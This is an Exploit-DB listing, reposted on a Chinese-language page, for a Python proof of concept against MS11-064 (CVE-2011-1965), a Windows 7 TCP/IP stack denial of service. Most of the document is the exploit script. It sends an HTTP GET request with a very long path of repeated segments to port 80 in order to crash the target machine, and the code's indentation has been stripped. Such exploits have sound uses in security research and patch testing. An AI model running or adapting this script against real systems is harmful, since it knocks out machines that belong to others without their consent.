Microsoft Windows – TCP/IP Stack Denial of Service (MS11-064)

  • 作者: Byoungyoung Lee
    日期: 2011-10-15
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/17981/
  • # Exploit Title: MS11-064 : Vulnerabilities in TCP/IP Stack Could
    Allow Denial of Service
    # Date: 10/12/2011
    # Author: Byoungyoung Lee, http://www.cc.gatech.edu/~blee303/
    # Version: Windows 7 32bit, fully patched until Aug 2011
    # Tested on: Windows 7 32bit
    # CVE : CVE-2011-1965
    
    # analysis is available -
    http://exploitshop.wordpress.com/2011/09/07/ms11-064-vulnerabilities-in-tcpip-stack-could-allow-denial-of-service-2563894/
    
    ------------------------------------------------------------------------------------------------------
    # Byoungyoung Lee, http://twitter.com/mylifeasageek
    import struct
    import socket
    
    HOST = "localhost" # yeah, we've tried this as a local kernel exploit -:)
    PORT= 80
    
    def tryOnce(i,j):
    print hex(i), hex(j)
    filename = ["a"*0x100 for x in range(i)]
    
    filename = "/".join(filename)
    filename += "/" + "b" * j
    print "filename len : ", hex(len(filename))
    
    hostname = "www.darungrim.org"
    
    header = "GET /%s\n" % filename
    header += "HOST: %s\n\n\n" % hostname
    
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST,PORT))
    s.send(header)
    response = s.recv(1024)
    s.close()
    print response
    return
    
    if __name__ == '__main__':
    tryOnce(0x3c,0x7)